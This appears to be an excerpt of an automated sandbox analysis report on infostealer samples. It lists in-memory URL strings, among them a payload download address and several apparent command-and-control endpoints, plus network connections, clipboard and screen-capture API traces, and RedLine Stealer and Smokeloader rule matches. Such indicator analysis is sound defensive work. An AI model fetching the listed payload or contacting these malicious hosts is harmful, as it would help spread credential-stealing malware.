                Source: DG55Gu1yGM.exe, 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
                Source: DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeR8
                Source: DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeZ0
                Source: DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, DG55Gu1yGM.exe, 00000000.00000002.4557144801.00000000005C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exea
                Source: DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exed
                Source: DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, DG55Gu1yGM.exe, 00000000.00000002.4557144801.00000000005C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exex
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/api
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://debonairnukk.xyz/apix
                Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.0000000000924000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://diffuculttan.xyz/api5
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: 8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api
                Source: 8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/apiR
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: DG55Gu1yGM.exe, 00000000.00000002.4557144801.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                Source: DG55Gu1yGM.exe, 00000000.00000002.4557144801.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/M
                Source: DG55Gu1yGM.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                Source: DG55Gu1yGM.exe, 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                Source: DG55Gu1yGM.exe, 00000000.00000002.4557144801.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                Source: DG55Gu1yGM.exe, 00000000.00000002.4557144801.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEk
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000094F000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000094F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/
                Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/api
                Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/api9
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550654344.0000000000928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/9
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: 8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900Y
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/
                Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/H
                Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/api0
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.5:49715 version: TLS 1.2
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_02121942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_02121942
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00431839

                System Summary

                barindex
                Source: 00000002.00000002.2550594932.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.4557098712.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_02122361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_02122361
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_02122605 NtdllDefWindowProc_W,PostQuitMessage,0_2_02122605
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004280220_2_00428022
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004071AB0_2_004071AB
